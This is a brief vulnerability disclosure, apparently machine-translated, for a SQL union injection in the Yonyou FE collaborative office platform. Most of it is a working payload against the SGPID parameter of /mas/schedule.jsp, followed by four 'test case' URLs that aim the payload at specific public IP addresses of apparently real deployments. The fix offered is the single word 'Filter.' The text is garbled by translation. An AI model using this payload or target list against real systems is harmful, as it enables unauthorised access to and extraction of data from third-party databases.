Yonyou FE collaborative Office Platform System Union Injection Vulnerability
A system of UFIDA does not strictly filter the data, resulting in union injection. Arbitrary data can be obtained.
The yonyou FE collaborative office system does not strictly filter a part of the system, and can be directly injected with union.
Injection link:/mas/schedule. jsp? Type = group & SGPID = injection parameter: SGPIDPayload: type = group & SGPID = 1' + UNION + ALL + SELECT + 1, @ version, --
Test Case: (1) http: // 111.198.15.8: 9090/mas/schedule. jsp? Type = group & SGPID = 1% 27 + UNION + ALL + SELECT + 1, @ version, 1, 1, 1 --
(2)
Http: // 60.12.5.140: 9090/mas/schedule. jsp? Type = group & SGPID = 1% 27 + UNION + ALL + SELECT + 1, @ version, 1, 1, 1 --
(3)
Http: // 218.205.208.22: 9090/mas/schedule. jsp? Type = group & SGPID = 1% 27 + UNION + ALL + SELECT + 1, @ version, 1, 1, 1 --
(4)
Http: // 183.129.249.246: 9090/mas/schedule. jsp? Type = group & SGPID = 1% 27 + UNION + ALL + SELECT + 1, @ version, 1, 1, 1 --
Solution:
Filter.